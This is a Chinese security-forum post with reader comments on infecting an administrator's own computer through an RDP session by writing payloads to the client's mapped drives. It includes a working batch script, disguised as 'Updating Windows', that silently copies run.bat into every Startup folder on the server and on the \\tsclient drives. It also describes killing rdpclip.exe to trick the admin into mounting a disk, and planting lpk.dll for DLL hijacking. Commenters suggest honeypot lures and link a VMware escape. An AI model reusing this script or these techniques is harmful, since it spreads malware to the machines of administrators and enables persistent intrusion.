远程桌面反向感染管理个人机
前置条件
1.mstsc需要开启驱动器C盘(win2008及以上只需剪切板即可文件传输)
2.win2003 如果要复制文件必须开驱动器
思路:
遍历tsclient的自启动目录 -》 添加执行程序 -》个人机重启 -》 上线
++
猥琐一些的思路:脚本找不到挂载磁盘的情况下直接结束rdpclip.exe 使管理员无法使用剪切板功能,他可能在修复时会挂载上磁盘
++
@ptvip 老司机思路,传lpk.dll
写bat脚本寻找所有挂载磁盘存在的exe文件,把每个目录都写一个lpk.dll
更新关于dll劫持
(lpk.dll只针对xp系统,高于xp的微软已经用KnownDLLs做了防范,需要发现其他的dll进行劫持)
++
@Solo_LD 结合蜜罐,反向搞黑客
@echo off
echo Updating Windows ...
@echo off
timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat "%%a" >nul 2>&1
copy C:\temp\run.bat "%%a" >nul 2>&1
copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
del /q %TEMP%\temp_00.txt >nul 2>&1关于作者
评论60次
这个思路感觉很不错 感谢分享 谢谢
3389钓鱼,放一些钓鱼数据,对方估计想不中招都不行!在渗透对方!存的粮食都归你了!
很好的思路,超强猥琐,感谢分享
说白了就是磁盘共享后。dll劫持。。
这是个好东西,感谢分享
有具体教程么 看的不是很懂 win2008的只要管理有开启剪切板就可以?意思就是服务器能复制捏贴就能中招? 服务器连着不是都能复制粘贴么
太淫荡了思路,永久收藏。感谢大牛分享。
思路很不错
学xi了 谢谢分享!
这思路爆表了 结合虚拟机逃逸用
这个可以有 可以挂个测试机弱口令。
这个6了
这个可以讨论!
虚拟机下能不能反感染个人机呢?
虚拟机的逃逸漏洞 比如这个https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware
这个有相关的exp么
挂载磁盘 还要必须是C盘。。。放到启动目录里 直接传lpk.dll也不错
嗯都可以 ,写个脚本寻找所有挂载磁盘的的exe文件 每个目录都写一个lpk.dll
这个是不是可以和蜜罐结合起来?
思路很发散啊
挂载磁盘 还要必须是C盘。。。放到启动目录里 直接传lpk.dll也不错
这个是不是可以和蜜罐结合起来?
话说,他加个 360 会不会就gg 了啊。。